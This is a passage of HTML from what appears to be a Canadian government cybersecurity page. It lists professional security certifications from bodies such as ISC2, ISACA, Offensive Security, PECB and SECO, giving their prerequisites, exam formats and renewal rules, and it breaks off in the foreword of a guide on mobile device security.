during 3-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Enterprise Architect</li> <li>Systems Engineer</li> <li>Systems Architect</li> <li>Security Administrator</li> <li>IT and Information Security Leaders</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Certified Information Systems Security Professional (CISSP)</h4> </div> <h5>Certification overview</h5> <ul><li>Advanced-level certification</li> <li>Candidates require a minimum of 5-years related work experience in at least 2 of the 8 (ISC)2 common body of knowledge of domains; or 4-years of work experience and a college degree or other approved credential</li> <li>Exam consists of 100-150 item computer adaptive testing</li> <li>Valid for 3 years</li> <li>Recertification requirements include obtaining 120 continuing professional education credits during the 3-year period</li> <li>Three concentrations are also available to those possessing valid CISSP certification: <ul><li>CISSP-ISSAP (Architecture)</li> <li>CISSP-ISSEP (Engineering)</li> <li>CISSP-ISSMP (Management)</li> </ul></li> </ul><h5>Intended candidates</h5> <ul><li>Chief Information Security Officer</li> <li>Chief Security Officer</li> <li>Security Analyst/Auditor</li> <li>Director of Security</li> <li>IT Director/Manager</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Healthcare Information Security and Privacy Practitioner (HCISPP)</h4> </div> <h5>Certification overview</h5> <ul><li>Validates knowledge and skills to implement, manager, or assess security and privacy controls for healthcare and patient information</li> <li>Designed for practitioners and consultants in healthcare information security and privacy</li> <li>Candidates require a minimum of 2-years work experience</li> <li>Exam consists of 125 multiple choice questions</li> <li>Valid for 3 years</li> <li>Recertification requires obtaining 60 continuing education credits during the 3-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Compliance Officer</li> <li>Medical Records Supervisor</li> <li>Practice Manager</li> <li>Information Security Manager</li> <li>Health Information Manager</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Systems Security Certified Practitioner (SSCP)</h4> </div> <h5>Certification overview</h5> <ul><li>Global IT security certification</li> <li>Entry-level certification</li> <li>Demonstrates that the holder has the technical skills and knowledge to implement, monitor, and administer an IT infrastructure.</li> <li>Designed for practitioners in operational IT roles or in information security</li> <li>Candidates must have 1 year of cumulative work experience in one or more of the 7 domains of SSCP Common Body of Knowledge; a 1-year experience waiver will be granted to candidates who hold a bachelorās or masterās degree in Cyber Security</li> <li>Exam consists of 125 multiple choice questions</li> <li>Valid for 3 years</li> <li>Recertification requires obtaining 60 continuing education credits during the 3-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Network Security Engineer</li> <li>Systems Administrator</li> <li>Security Analyst</li> <li>Systems/Network Analyst</li> <li>Security Consultant</li> <li>IT Administrators, Directors, or Managers</li> </ul></details><details class="grouped" id="wb-auto-12"><summary><h3 id="tab9">4.9 ISACA</h3> </summary><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Certified Cybersecurity Practitioner (CSXāP)</h4> </div> <h5>Certification overview</h5> <ul><li>New certification created in 2015</li> <li>Recognizes individuals who can act as first responders for security incidents</li> <li>The only certification that tests oneās ability to perform globally validated cyber security covering the 5 core functions of the NIST Cyber Security Framework; Identify, Protect, Detect, Respond, and Recover</li> <li>Candidates must pass a performance-based exam consisting of simulated security incidents.</li> <li>Valid for 3 years</li> <li>Recertification requirements include obtaining 120 hours of continuing professional education during 3-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Security Practitioners</li> <li>Incident Handlers</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Certified in Risk and Information Systems Control (CRISC)</h4> </div> <h5>Certification overview</h5> <ul><li>Recognizes those who identify, evaluate, and manage risk through the development, implementation, and maintenance of information systems controls</li> <li>Candidates must have 3-years of professional-level risk management and control experience, no education substitutes</li> <li>Valid for 3 years</li> <li>Recertification requirements include obtaining 120 hours of continuing professional education during a 3-year period</li> </ul><h5>Intended candidates</h5> <ul><li>IT and Business professionals</li> <li>Risk and Compliance professionals</li> <li>Business Analysts</li> <li>Project Managers</li> <li>Security directors</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Certified Information Security Manager (CISM)</h4> </div> <h5>Certification overview</h5> <ul><li>Management focused certification</li> <li>Recognizes candidates who manage, design, oversee, and assess an enterpriseās information security</li> <li>Candidates require a minimum of 5-years of information security experience gained within the 10-year period before writing the exam</li> <li>Written application is required</li> <li>Exam consists of 150 questions / 4 hours long</li> <li>Valid for 3 years</li> <li>Recertification requirements include obtaining 120 hours of continuing professional education during 3-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Information security managers and directors</li> <li>IT Security Analysts</li> <li>Risk Analysts</li> <li>IT Auditor</li> <li>Information Systems Security Manager</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Certified Information Systems Auditor (CISA)</h4> </div> <h5>Certification overview</h5> <ul><li>Globally recognized certification</li> <li>Validates a candidateās audit experience, skills and knowledge, and ability to assess vulnerabilities, report on compliance and institute controls within the enterprise</li> <li>Candidates require 5 years of professional information systems (IS) auditing, control or security work experience; some education substitutes</li> <li>Exam consists of 150 questions</li> <li>Certificate holders are required to take at least 120 hours of continuing education during the 3-year period</li> </ul><h5>Intended candidates</h5> <ul><li>IS audit control, assurance, and security professionals</li> </ul></details><details class="grouped" id="wb-auto-13"><summary><h3 id="tab10">4.10 itSM Solutions</h3> </summary><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">NIST Cyber Security Professional (NCSP) Foundation</h4> </div> <h5>Certification overview</h5> <ul><li>Entry-level certification</li> <li>Validates that a candidate has the knowledge and ability to operationalize the NIST Cyber Security Framework</li> <li>No prerequisites but basic computing skills and security knowledge are recommended</li> <li>Exam consists of 40 multiple choice questions</li> </ul><h5>Intended candidates</h5> <ul><li>Security, IT, Risk Management professionals</li> <li>Auditors</li> <li>Other professions who need to understand the basics of cyber security, the components of the NIST Cyber Security Framework and how it aligns to risk management</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">NCSP Practitioner</h4> </div> <h5>Certification overview</h5> <ul><li>Validates a candidateās skills and abilities to design, build, test, manage, improve a cyber security program based on NCSF</li> <li>Candidates must complete the NCSF Foundation training/exam before attempting the exam</li> <li>Exam consists of 65 multiple choice questions</li> </ul><h5>Intended candidates</h5> <ul><li>IT and Cyber Security Professionals</li> </ul></details><details class="grouped" id="wb-auto-14"><summary><h3 id="tab11">4.11 McAfee Institute</h3> </summary><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Certified Counterintelligence Threat Analyst (CCTA)</h4> </div> <h5>Certification overview</h5> <ul><li>Validates a candidateās ability to identify and investigate cyber criminals, conduct cyber counterintelligence investigations to mitigate threats, and investigate and prosecute hackers and cyber criminals</li> <li>Prerequisites: Bachelorās degree or higher and 3 years of experience in a related field, or associate degree and 4 years of experience</li> <li>Candidates must pass a background check</li> <li>Exam consists of 200 questions</li> <li>Valid for 2 years</li> <li>To renew, candidates must pay a renewal fee and obtain continuing education credits</li> </ul><h5>Intended candidates</h5> <ul><li>Individuals in cyber security, law enforcement, loss prevention roles</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Certified Cyber Intelligence Investigator (CCII)</h4> </div> <h5>Certification overview</h5> <ul><li>Validates a candidateās ability to conduct cyber investigations, utilize methodologies to prosecute cyber criminals, apply mobile and digital forensics, recognize fraud and hacking, and develop intelligence gathering.</li> <li>Perquisites: Bachelorās degree or higher and 1 year of experience in a related field, or an associate degree and 2 years of experience</li> <li>Candidates must pass a background check</li> <li>Exam consists of 200 questions</li> <li>Valid for 2 years</li> <li>To renew, candidates must pay a renewal fee and obtain continuing education credits</li> </ul><h5>Intended candidates</h5> <ul><li>Individuals in cyber security, law enforcement, loss prevention roles</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Certified Cyber Intelligence Professional (CCIP)</h4> </div> <h5>Certification overview</h5> <ul><li>Validates a candidateās ability to conduct cyber investigations, utilize methodologies to prosecute cyber criminals, design and implement a cyber program, understand mobile and digital forensics, and recognize fraud and hacking</li> <li>Perquisites: Bachelorās degree or higher and 3 years of experience in a related field, or an associate degree and 4 years of experience</li> <li>Candidates must pass a background check</li> <li>Exam consists of 200 questions</li> <li>Valid for 2 years</li> <li>To renew, candidates must pay a renewal fee and obtain continuing education credits</li> </ul><h5>Intended candidates</h5> <ul><li>Individuals in cyber security, law enforcement, loss prevention roles</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Certified Expert in Cyber Investigations (CECI)</h4> </div> <h5>Certification overview</h5> <ul><li>Validates a candidateās ability to recognize and identify cyber criminals, conduct cyber counterintelligence investigations to mitigate threats, protect an organizationās assets and information, and investigate and prosecute hackers and cybercriminals</li> <li>Prerequisites: Bachelorās degree or higher and 4 years of experience in a related field, or an associate degree and 6 years of experience</li> <li>Candidates must pass a background check</li> <li>Exam consists of 200 true/false, multiple choice, and scenario-based questions.</li> <li>Valid for 2 years</li> <li>To renew, candidates must pay a renewal fee and obtain continuing education credits</li> </ul><h5>Intended candidates</h5> <ul><li>Individuals in cyber security, law enforcement, loss prevention roles</li> </ul></details><details class="grouped" id="wb-auto-15"><summary><h3 id="tab12">4.12 Offensive Security</h3> </summary><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Offensive Security Certified Expert (OSCE)</h4> </div> <h5>Certification overview</h5> <ul><li>Demonstrates that a candidate has a mastery of advanced penetration testing skills; analyze, correct, modify, and port exploit code; and craft binaries to evade antivirus software</li> <li>Candidates should have prior knowledge of Windows exploitation techniques, Linux experience, and a solid understanding of TCP/IC and networking</li> <li>Candidates must complete the Cracking the Perimeter course before attempting exam</li> <li>Exam has a 48-hour time limit and consists of hands on penetration testing in an isolated virtual private network (VPN); must also submit a comprehensive test report</li> </ul><h5>Intended candidates</h5> <ul><li>Penetration Testers</li> <li>Security Professionals</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Offensive Security Certified Professional (OSCP)</h4> </div> <h5>Certification overview</h5> <ul><li>Validates the knowledge and skills needed to identify vulnerabilities and execute organized attacks in a controlled and focused manner</li> <li>Intended for penetration testers with strong technical and ethical hacking backgrounds, and a solid understanding of TCP/IP networking</li> <li>Candidates must first complete the Penetration Testing training course</li> <li>Certification is hard to obtain due to its notoriously difficult exam</li> <li>Candidates must pass a 24-hour exam where they are required to attack and penetrate live machines in a safe lab environment; must also submit a comprehensive penetration test report</li> <li>Certification never expires</li> </ul><h5>Intended candidates</h5> <ul><li>Penetration Testers</li> <li>Network Administrators</li> <li>Network Security Professionals</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Offensive Security Exploitation Expert (OSEE)</h4> </div> <h5>Certification overview</h5> <ul><li>Requires significant time investment</li> <li>Validates a candidateās ability to analyze vulnerable software, find problematic code, develop sophisticated exploits under various modern Windows operating systems</li> <li>Candidates should have experience in developing windows exploits and understand how to operate a debugger</li> <li>Candidates must complete the Advanced Windows Exploitation course before attempting the exam</li> <li>Candidates should obtain OSCE certification first</li> <li>Exam consists of developing and documenting exploits during a 72-hour period; must also submit a comprehensive penetration test report</li> <li>Certification qualifies the recipient for 40 (ISC)2 continuing education credits</li> <li>Certification never expires</li> </ul><h5>Intended candidates</h5> <ul><li>Penetration Testers</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Offensive Security Web Expert (OSWE)</h4> </div> <h5>Certification overview</h5> <ul><li>Validates that a candidate has practical knowledge of web application assessment and hacking process; and ability to review advanced source code in web applications, identify vulnerabilities, and exploit them</li> <li>Candidates should have familiarity with coding languages and Linux, ability to write scripts, experience with web proxies, a general understanding of web app attack vectors, theory and practice, and a solid understanding of TCP/IP and networking</li> <li>Candidates are required to take the Advanced Web Attacks and Exploitation course before attempting the exam</li> <li>48-hour exam consisting of hands-on web application assessment in an isolated VPN network; successful candidates must also submit an assessment report</li> <li>Certification never expires</li> </ul><h5>Intended candidates</h5> <ul><li>Penetration Testers</li> <li>Web Application Security Specialists</li> <li>Software Engineers</li> <li>Web Developers</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Offensive Security Wireless Professional (OSWP)</h4> </div> <h5>Certification overview</h5> <ul><li>Validates a candidateās ability to identify existing encryptions and vulnerabilities in Institute of Electronic Engineers (IEEE) 802.11 networks, circumvent security restrictions and recover encryption keys in use</li> <li>Candidates must have a solid understanding of TCP/IP and the Open Systems Interconnections (OSI) model, familiarity with Linux</li> <li>Candidates must complete the Offensive Security Wireless Attacks course before attempting the exam</li> <li>4-hour exam requires that candidate to conduct wireless info gathering, and implement various attacks to get access to the target networks; must also submit a penetration test report</li> <li>Certification never expires</li> </ul><h5>Intended candidates</h5> <ul><li>Network Administrators</li> <li>Penetration Testers</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Security Operations and Defensive Analysis (OSDA)</h4> </div> <h5>Certification overview</h5> <ul><li>Validates candidates can recognize common methodologies for end-to-end attack chains (MITRE ATT&CKĀ® framework)</li> <li>Candidates can conduct guided audits of compromised systems across multiple operating systems</li> <li>Candidates will demonstrate ability using a SIEM to identify and assess an attack as it unfolds live</li> <li>Validates candidates can manually inspect logs in order to be able to recognize both normal and abnormal or benign and malicious activity</li> <li>Certification must be renewed every three years</li> </ul><h5>Intended candidates</h5> <ul><li>Penetration Testers</li> <li>Network Security Professionals</li> </ul></details><details class="grouped"><summary><h3 id="tab13">4.13 PECB</h3> </summary><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Certified Lead Ethical Hacker</h4> </div> <h5>Certification overview</h5> <ul><li>Validates a candidateās knowledge of information gathering tools and techniques, threat modeling and vulnerability identification, exploitation techniques, reporting, etc.</li> <li>Candidates are required to have knowledge of information security concepts and principles and advanced skills in operating systems</li> <li>Candidates are required to have 2 years of penetration testing and cyber security experience</li> <li>Candidates are required to sign the PECB Code of Ethics and the PECB CLEH Code of Conduct</li> <li>6-hour open book exam consists of 2 parts: the candidate must first compromise 2 or more target machines through penetration testing, then document the process in a written report</li> <li>Valid for 3 years</li> </ul><p>Renewal requirements include demonstrating that you have are still performing tasks related to the certification, meeting the required number of Continuing Professional Development (CPD) credits, and paying the annual maintenance fee</p> <h5>Intended candidates</h5> <ul><li>Individuals responsible for the security of information systems</li> <li>Information Security team members</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Computer Forensics Foundation</h4> </div> <h5>Certification overview</h5> <ul><li>Validates a candidateās knowledge of the fundamental principles and concepts of computer forensics and computer forensics processes</li> <li>No prerequisites</li> <li>Candidates are required to sign the PECB Code of Ethics</li> <li>1-hour open book exam consists of 5 essay type questions Valid for 3 years</li> <li>Renewal requirements include demonstrating that you have are still performing tasks related to the certification, meeting the required number of Continuing Professional Development (CPD) credits, and paying the annual maintenance fee</li> </ul><h5>Intended candidates</h5> <ul><li>Individuals interested in pursuing a career in Computer Forensics</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">ISO/IEC 27032 Foundation</h4> </div> <h5>Certification overview</h5> <ul><li>Validates an individualās knowledge of the fundamental cyber security principles and concepts, and understanding of the approaches, methods, and techniques used in cyber security</li> <li>No prerequisites</li> <li>Candidates are required to sign the PECB Code of Ethics</li> <li>1 hour exam consists of 40 multiple choice questions</li> <li>Valid for 3 years</li> <li>Renewal requirements include demonstrating that you have are still performing tasks related to the certification, meeting the required number of Continuing Professional Development (CPD) credits, and paying the annual maintenance fee</li> </ul><h5>Intended candidates</h5> <ul><li>Cyber security and Information Security professionals</li> <li>Individuals interested in pursuing a career in cyber security</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">ISO/IEC 27032 Lead Cybersecurity Manager</h4> <ul><li>Certified Provisional</li> <li>Certified</li> <li>Certified Lead</li> <li>Certified Senior Lead</li> </ul></div> <h5>Certification overview</h5> <ul><li>Validates a candidateās knowledge of the fundamental principles and concepts of cyber security, roles and responsibilities of stakeholders, cyber security risk management, attack mechanisms and cybersecurity controls, information sharing and coordination, integrating a cyber security program in business continuity management, and cyber security incident management and performance measurement</li> <li>Candidates are required to have a fundamental understanding of ISO/IEC 27032 and comprehensive knowledge of cyber security</li> <li>Candidates are required to sign the PECB Code of Ethics</li> <li>3-hour open book exam consists of 12 essay type questions</li> <li>Candidates who pass the exam can apply for 1 of 4 credentials based on the number of years of work experience, cyber security experience, and total number of hours of cyber security activities</li> <li>Valid for 3 years</li> <li>Renewal requirements include demonstrating that you have are still performing tasks related to the certification, meeting the required number of Continuing Professional Development (CPD) credits, and paying the annual maintenance fee</li> </ul><h5>Intended candidates</h5> <ul><li>Cyber security and Information Security Professionals</li> <li>Individuals responsible for developing and/or managing a cyber security program</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Lead Forensics Examiner</h4> <ul><li>Certified Provisional</li> <li>Certified</li> <li>Certified Lead</li> </ul></div> <h5>Certification overview</h5> <ul><li>Validates a candidateās knowledge of the fundamental principles and concepts of computer forensics, digital forensics lab requirements, computer crime investigation and forensics examinations, and maintaining chain of evidence</li> <li>Candidates are required to have knowledge of computer forensics</li> <li>Candidates are required to sign the PECB Code of Ethics</li> <li>3-hour exam open book exam consists of 14 essay type questions</li> <li>Candidates who pass the exam can apply for 1 of 3 credentials (based on the number of years of work experience, cyber security experience, and total number of hours of forensics activities</li> <li>Valid for 3 years</li> <li>Renewal requirements include demonstrating that you have are still performing tasks related to the certification, meeting the required number of Continuing Professional Development (CPD) credits, and paying the annual maintenance fee</li> </ul><h5>Intended candidates</h5> <ul><li>Computer Forensics specialists and consultants</li> <li>Cyber Security professionals</li> <li>Cyber Intelligence Analysts</li> <li>Law Enforcement professionals</li> <li>Electronic Data Analysts</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Lead Pen Test Professional</h4> <ul><li>Certified Provisional</li> <li>Certified</li> <li>Certified Lead</li> </ul></div> <h5>Certification overview</h5> <ul><li>Validates a candidateās knowledge of the fundamental principles and concepts in penetration testing, technical foundation of penetration testing, testing types, and analyzing results and the reporting process</li> <li>Candidates are required to have a fundamental understanding of penetration testing and comprehensive knowledge of cyber security</li> <li>Candidates are required to sigh the PECB Code of Ethics</li> <li>3-hour exam consists of 150 multiple choice questions</li> <li>Candidates who pass the exam can apply for 1 of 3 credentials (based on the number of years of work experience, pen testing experience, and total number of hours of pen testing activities</li> <li>Valid for 3 years</li> <li>Renewal requirements include demonstrating that you have are still performing tasks related to the certification, meeting the required number of Continuing Professional Development (CPD) credits, and paying the annual maintenance fee</li> </ul><h5>Intended candidates</h5> <ul><li>IT Professionals</li> <li>Auditors</li> <li>IT and Risk Mangers</li> <li>Penetration Testers</li> <li>Ethical Hackers</li> </ul></details><details class="grouped" id="wb-auto-16"><summary><h3 id="tab14">4.14 SECO Institute</h3> </summary><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Certified Ethical Hacker (SāEHE)</h4> </div> <h5>Certification overview</h5> <ul><li>Program is currently being re-designed</li> </ul><h5>Intended candidates</h5> <ul><li>N/A</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Dark Web Foundations</h4> </div> <h5>Certification overview</h5> <ul><li>Entry-level certification</li> <li>Developed by the Netherlands Organisation for Applied Scientific Research in collaboration with the International Criminal Police Organization (INTERPOL)</li> <li>Demonstrates that a candidate understands how to use the dark web in a secure way</li> <li>Exam consists of 40 multiple choice questions</li> <li>Valid for 3 years</li> </ul><h5>Intended candidates</h5> <ul><li>IT Security Professionals</li> <li>Law Enforcement</li> <li>Policy makers and Government Officials</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Ethical Hacking Foundations (SāEHF)</h4> </div> <h5>Certification overview</h5> <ul><li>Entry-level certification</li> <li>Validates that a candidate has an in-depth understanding of basic penetration testing techniques and possesses fundamental hacking skills</li> <li>Exam consists of 40 multiple choice questions</li> <li>Valid for life and is not subject to re-certification requirements</li> </ul><h5>Intended candidates</h5> <ul><li>Web Developers</li> <li>Computer Software Engineers</li> <li>Security Administrator</li> <li>Network Engineer</li> <li>Ethical Hackers</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Ethical Hacking Leader (SāEHL)</h4> </div> <h5>Certification overview</h5> <ul><li>Highest achievable qualification in the Ethical Hacking certification track</li> <li>Demonstrates that a candidate has excellent penetration testing skills and experience in leading penetration tests</li> <li>Candidates must have expert-level knowledge (SECO Expert level certificate or equivalent) and at least 3 years of relevant work experience</li> <li>No exam</li> <li>Valid for 1 year</li> <li>To renew, candidates must pay annual membership fees and obtain 40 continuing education credits during the year</li> </ul><h5>Intended candidates</h5> <ul><li>Professionals who seek to validate the expertise they have built up through hands-on work experience</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Ethical Hacking Practitioner (SāEHP)</h4> </div> <h5>Certification overview</h5> <ul><li>Validates that a candidate has a full understanding of the penetration testing process and familiarity with common penetration testing techniques</li> <li>Candidates should have a good understanding of ethical hacking fundamentals</li> <li>S-EHF certificate (or equivalent) is recommended</li> <li>3-part exam: 10 multiple choice questions, 5 essay type questions and 1 case study</li> <li>To renew, candidates must pay annual membership fees and obtain 60 continuing education credits over the 3-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Web Developers</li> <li>Security Administrators</li> <li>Network Engineers</li> <li>Computer Software Engineers</li> <li>Aspiring Penetration Testers</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">IT Security Expert/SOC (S-ITSE/SOC)</h4> </div> <h5>Certification overview</h5> <ul><li>Validates that a candidate has acquired the knowledge and skills necessary to assume responsibility for threat detection, analysis and response, and can improve an organizationās overall security poster</li> <li>Candidates should have a basic understanding of TCP/IP, operating system fundamentals and common security concepts, and 2 years of experience in a SOC</li> <li>Prerequisite is the S-ITSP or equivalent</li> <li>Candidates can choose 1 of 2 specializations: SOC Manager or IT Security Manager</li> <li>Valid for 1 year</li> <li>To renew, candidates must pay annual membership fees and obtain 120 continuing education credits over the 3-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Individuals that want to become Tier I/Tier II Soc Analysts</li> <li>Future SOC Managers</li> <li>System Engineers</li> <li>Security Analysts</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">IT Security Foundation (SāITSF)</h4> </div> <h5>Certification overview</h5> <ul><li>Entry-level certification</li> <li>Validates that a candidate has a basic understanding of computer architecture, common hardware vulnerabilities and security measures</li> <li>No prerequisites and suitable for beginners with basic understanding of computers and technology</li> <li>Exam consists of 40 multiple choice questions</li> <li>Valid for life and not subject to re-certification requirements</li> </ul><h5>Intended candidates</h5> <ul><li>Network or System Administrator</li> <li>Individuals looking to start a career in IT Security</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">IT Security Practitioner (SāITSP)</h4> </div> <h5>Certification overview</h5> <ul><li>Validates a candidateās technical competencies in vulnerability management, firewall and network security, security architecture and penetration testing</li> <li>Candidates should have a good understanding of fundamental IT security terms, concepts and principle</li> <li>IT Security Foundation certificate (or equivalent) is recommended</li> <li>Exam includes 10 multiple choice questions, 5 open questions, and 1 case study</li> <li>Valid for 1 year</li> <li>To renew, candidates must pay annual membership fees and obtain 60 continuing education credits during the year</li> </ul><h5>Intended candidates</h5> <ul><li>Security Administrators</li> <li>Security Analysts</li> <li>Security Architects</li> <li>Security Auditors</li> <li>Future SOC Analysts</li> </ul></details></div> </section><div class="pull-right mrgn-tp-md small text-muted mrgn-bttm-md"><a href="#wb-tphp" title="Return to Top of page">Top of page</a></div> <div class="clearfix">Ā </div> <section><h2 id="E">5.0 Cyber Security certification listings and descriptions</h2> <details><summary><h3>5.1 List of abbreviations</h3> </summary><dl class="dl-horizontal"><dt>AI</dt> <dd>Artificial Intelligence</dd> <dt>(ICS)2</dt> <dd>International Information Systems Security Certification Consortium</dd> <dt>C3</dt> <dd>Cyber Credentials Collaborative</dd> <dt>CCSMS</dt> <dd>Central configuration setting management system</dd> <dt>CNSS</dt> <dd>Committee on National Security Systems</dd> <dt>CompTIA</dt> <dd>Computing Technology Industry Association</dd> <dt>CREST</dt> <dd>Council for Registered Ethical Testers</dd> <dt>CSA</dt> <dd>Cloud Security Alliance</dd> <dt>CSE</dt> <dd>Communications Security Establishment</dd> <dt>CWNP</dt> <dd>Certified Wireless Network Professionals</dd> <dt>Cyber Centre</dt> <dd>Canadian Centre for Cyber Security</dd> <dt>GIAC</dt> <dd>Global Information Assurance Certification</dd> <dt>GCHQ</dt> <dd>Government Communications Headquarters</dd> <dt>IAS</dt> <dd>International Accreditation Service</dd> <dt>IEC</dt> <dd>International Electrotechnical Commission</dd> <dt>ICS</dt> <dd>Industrial control systems</dd> <dt>IEEE</dt> <dd>Institute of Electronic Engineers</dd> <dt>INTERPOL</dt> <dd>International Criminal Police Organization</dd> <dt>IoT</dt> <dd>Internet of Things</dd> <dt>IS</dt> <dd>Information System</dd> <dt>ISACA</dt> <dd>Information Systems Audit and Control Association</dd> <dt>ISO</dt> <dd>International Organization for Standardization</dd> <dt>IT</dt> <dd>Information technology</dd> <dt>NERC CIP</dt> <dd>North American Electric Reliability Corporate Critical Infrastructure Protection</dd> <dt>NICCS</dt> <dd>National Initiative for Cyber Security Careers and Studies</dd> <dt>NIST</dt> <dd>National Institute of Standards and Technology</dd> <dt>NSA</dt> <dd>National Security Agency</dd> <dt>OS</dt> <dd>Operating system</dd> <dt>OSI</dt> <dd>Open systems interconnection</dd> <dt>PCI</dt> <dd>Payment card industry</dd> <dt>RBC</dt> <dd>Royal Bank of Canada</dd> <dt>RFID</dt> <dd>Radio frequency identification</dd> <dt>SCADA</dt> <dd>Supervisory control and data acquisitions</dd> <dt>SDLC</dt> <dd>Software development life cycle</dd> <dt>SECO</dt> <dd>Security and Continuity Institute</dd> <dt>SIEM</dt> <dd>Security Information and Event Management</dd> <dt>SOC</dt> <dd>Security Operations Centre</dd> <dt>TSP/IP</dt> <dd>Transmission control Protocol/Internet Protocol</dd> <dt>UKAS</dt> <dd>United Kingdom Accreditation Service</dd> <dt>VPN</dt> <dd>Virtual private network</dd> <dt>WLAN</dt> <dd>Wireless local area network</dd> </dl></details><aside class="wb-fnote" role="note"><h3 id="fn">5.2 References</h3> <dl><dt>1</dt> <dd id="fn1"> <p>Steve Morgan. ā<a href="https://cybersecurityventures.com/10-hot-cybersecurity-certifications-for-it-professionals-to-pursue-in-2019/" rel="external">10 Hot Cybersecurity Certifications for IT Professionals to Pursue in 2020</a>ā, Cyber Crime Magazine. 24 May, 2020.</p> <p class="fn-rtn"><a href="#fn*-rf"><span class="wb-inv">Return to footnote </span>1<span class="wb-inv"> referrer</span></a></p> </dd> <dt>2</dt> <dd id="fn2"> <p>Every effort has been made to ensure the accuracy of the information in this table; however, the information is subject to change at any time.</p> <p class="fn-rtn"><a href="#fn2-rf"><span class="wb-inv">Return to footnote </span>2<span class="wb-inv"> referrer</span></a></p> </dd> </dl></aside></section></div> </div> </div> </div> </div> </div> </div> </article>
- Security configurations and best practices to protect your mobile device (ITSM.80.002)by Canadian Centre for Cyber Security on May 7, 2026 at 3:17 pm
<article data-history-node-id="7561" about="/en/guidance/security-configurations-best-practices-protect-your-mobile-device-itsm80002" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><div class="row"> <div class="col-md-4 pull-left hidden-xs hidden-sm"> <p class="text-left"><strong>May 2026</strong></p> </div> <div class="col-md-4 hidden-xs hidden-sm"> <p class="text-center"><strong>Management series</strong></p> </div> <div class="col-md-4 pull-right hidden-xs hidden-sm"> <p class="text-right"><strong>ITSM.80.002</strong></p> </div> <!–MOBILE STARTS HERE–> <div class="hidden-lg hidden-md text-center"> <p><strong>May 2026Ā |Ā Management series</strong></p> </div> <div class="col-md-12 mrgn-tp-lg"> <h2 class="text-info mrgn-tp-0">Foreword</h2> <section><p>In todayās digital landscape, mobile devices play a pivotal role in our daily lives, aiding in productivity, enabling seamless communication, and facilitating transactions. Their significance extends beyond personal use, impacting the efficiency and success of businesses as well. Despite the numerous benefits of mobile device, the surge in their usage has also heightened the risk of security threats and highlights the need to protect them.</p> <p>At a personal level, individuals rely heavily on mobile devices like smartphones, tablets, and laptops to store important information such as contacts, passwords, emails, and personal data. Consequently, it is imperative protect these devices against unauthorized access. Similarly, within organizations, mobile devices are essential tools for communicating, collaborating, and accessing corporate data. However, the inherent vulnerability of these devices makes them attractive targets for threat actors. A security breach not only puts clientsā and employees’ personal data at risk but also has significant consequences for the organization. Unauthorized access could potentially compromise 